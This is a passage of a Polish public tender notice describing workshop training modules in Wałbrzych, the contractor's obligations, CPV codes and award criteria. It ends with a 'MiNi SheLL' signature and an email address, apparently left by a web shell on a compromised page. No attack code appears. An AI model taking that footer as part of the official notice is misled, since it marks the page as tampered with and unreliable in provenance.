2)	Moduł II - Wyznaczanie celów życiowych - łącznie 24 godziny zajęć (4 dni po 6 godzin zajęć). Zajęcia prowadzone w formie warsztatowej dla jednej grupy 30-osobowej. W ramach realizacji zajęć Zamawiający założył następującą tematykę:

a)	rozwijanie kompetencji interpersonalnych i samopoznawczych,
b)	zwiększenie skuteczności osobistej w odnoszeniu sukcesów.

3) Moduł III - Zarządzanie własnym potencjałem - łącznie 24 godzin  zajęć (4 dni po 6 godzin zajęć). Zajęcia prowadzone w formie warsztatowej w jednej grupie 30-osobowej. W ramach realizacji zajęć Zamawiający założył następującą tematykę: 

a)	doskonalenie koncepcji swojego JA i wiary we własne możliwości w aspekcie interpersonalnym,
b)	rozwijanie własnych zasobów inteligencji emocjonalnej.

4) Moduł IV - Sztuka rozwiązywania konfliktów - łącznie 24 godzin zajęć (4 dni po 6 godzin zajęć). Zajęcia prowadzone w formie warsztatowej w jednej grupie 30-osobowej. W ramach realizacji zajęć Zamawiający założył następującą tematykę: 
		
a)	rodzaje, przyczyny i konsekwencje konfliktów,
b)	sposoby rozwiązywania konfliktów.  
	
 Inne istotne warunki dotyczące przedmiotu zamówienia:

1)	W ramach świadczonej usługi Wykonawca będzie zobowiązany do:
a)	zapewnienia uczestnikom zajęć jednego ciepłego posiłku w trakcie trwania zajęć, składającego się z dwóch dań - zupy oraz drugiego dania wraz z napojami.
b)	Opracowania wzoru certyfikatu dla uczestników zajęć (zawierającego odpowiednie ologowania) poświadczającego udział w zajęciach oraz  ich ukończenie. 
c)	opracowania szczegółowego programu szkolenia w zakresie niezbędnym do przeprowadzenia zajęć,  
d)	opracowania testu wiedzy na zakończenie każdego z modułów zajęć oraz kwestionariusza obserwacji na początku oraz końcu treningu.
e)	przygotowania raportu końcowego z przeprowadzonych zajęć,
f)	poniesienia kosztów związanych z ubezpieczeniem uczestników poszczególnych zajęć od następstw nieszczęśliwych wypadków (NNW),
g)	prowadzenia na bieżąco dokumentacji dotyczącej prowadzonych zajęć, w szczególności list obecności uczestników zajęć oraz dziennika zajęć.
h)	zapewnienia trenera, posiadającego wykształcenia wyższe, o kierunku pedagogicznym, psychologicznym lub socjologicznym, posiadającego co najmniej roczne doświadczenie w zakresie pracy z osobami zagrożonymi wykluczeniem społecznym,
i)	opracowania materiałów szkoleniowych niezbędnych do przeprowadzenia zajęć (wydruk 
i oprawienie materiałów będzie leżało po stronie Zamawiającego).

2)	Zamawiający informuje, iż zajęcia stacjonarne w ramach modułu II, III oraz IV odbywać się będą w pomieszczeniach zapewnionych i wskazanych przez Zamawiającego, tj. w Centrum Integracji Rodziny przy ul. Grota Roweckiego 3 w Wałbrzychu.
3)	Zajęcia stacjonarne będą odbywały się zgodnie z ustalonym harmonogramem w dniach roboczych, w godzinach pomiędzy 8.00 a 15.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 80.52.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com